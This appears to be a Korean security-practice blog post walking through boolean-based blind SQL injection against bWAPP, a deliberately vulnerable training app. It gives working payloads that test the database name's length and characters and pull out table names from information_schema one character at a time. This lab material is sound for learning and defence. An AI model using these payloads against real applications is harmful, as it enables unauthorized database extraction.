owasp 실습(bwapp) -1 (SQL injection blind boolean based)

2020. 12. 8. 10:07·Web hacking

vmware로

open virtualmachine

bee-box 

 

 

SQL injection blind booolean based

 

 

 

 

 

------------------(참/거짓반응)

 

 

 

' or 1=1

 

 

 

 

(거짓 반응)

 

 

 

 

 

 

 

 

 

 

 

 

 

1. 현재 접속중인 db의 글자수와 첫번째 문자

 

 

 

 

 

' or 1=1 and length(database())=5#

 

(and 전까지 참 그뒤를 참으로 만들어버리는것이다.)

 

 

 

 

 

 

'or '1'='1' and substring(database(),1,1) > 'a'#

(소문자인지 대문자인지 소문자가 아스키코드가 더크다.)

 

 

 

 

 

'or '1'='1' and substring(database(),1,1) > 'f'#

 

답은 '`b'

 

 

' or 1=1 and substring(database(),1,1)='b'#

' or 1=1 and substring((select database()),1,1)='b'#

 

 

 

 

 

 

 

 

2. 현재 접속중인  db의 세번쨰 테이블명의 세번쨰 문자

 

 

 

                                              

 

' or '1'='1' and substring((select table_name from information_schema.tables where table_schema=database() limit 2,1),3,1) >'a'#

 

이런식으로 계속 하면된다

그러면 답은.

 

' or '1'='1' and substring((select table_name from information_schema.tables where table_schema=database() limit 2,1),3,1)='v'#

'Web hacking' 카테고리의 다른 글

owasp 실습(bwapp) -3 (sql injection blind (ws/soap)  (0) 2020.12.08
owasp 실습(bwapp) -2 (sql injection blind time based)  (0) 2020.12.08
oswasp 실습(BodgeIt)  (0) 2020.12.07
owasp 실습(WackoPicko)  (0) 2020.12.07
owasp 실습 (peruggia)  (0) 2020.12.07
'Web hacking' 카테고리의 다른 글
  • owasp 실습(bwapp) -3 (sql injection blind (ws/soap)
  • owasp 실습(bwapp) -2 (sql injection blind time based)
  • oswasp 실습(BodgeIt)
  • owasp 실습(WackoPicko)
taktaks
taktaks
보안 연습 일기장입니다. 모든 연습은 불법적인 용도로 사용하지 말아주시길 부탁드립니다. 용무는 wndudxkr2005@gmail.com 메일 부탁드립니다.
  • taktaks
    taktaks
    taktaks
  • 전체
    오늘
    어제
    • 보안 일지 (280)
      • 네트워크 구축 (12)
      • 리눅스 보안구축 (10)
      • 파이썬 기본 (11)
      • Web hacking (39)
      • 통합 인프라 보안 (41)
      • 공격기법 및 탐지 (33)
      • 악성코드 및 포렌식 (93)
      • 리버싱 (5)
      • 시스템 해킹 (20)
      • C 언어 (12)
  • 블로그 메뉴

    • 링크

    • 공지사항

    • 인기 글

    • 태그

      프롯
    • 최근 댓글

    • 최근 글

    • hELLO· Designed By정상우.v4.10.3
    taktaks
    owasp 실습(bwapp) -1 (SQL injection blind boolean based)
    상단으로

    티스토리툴바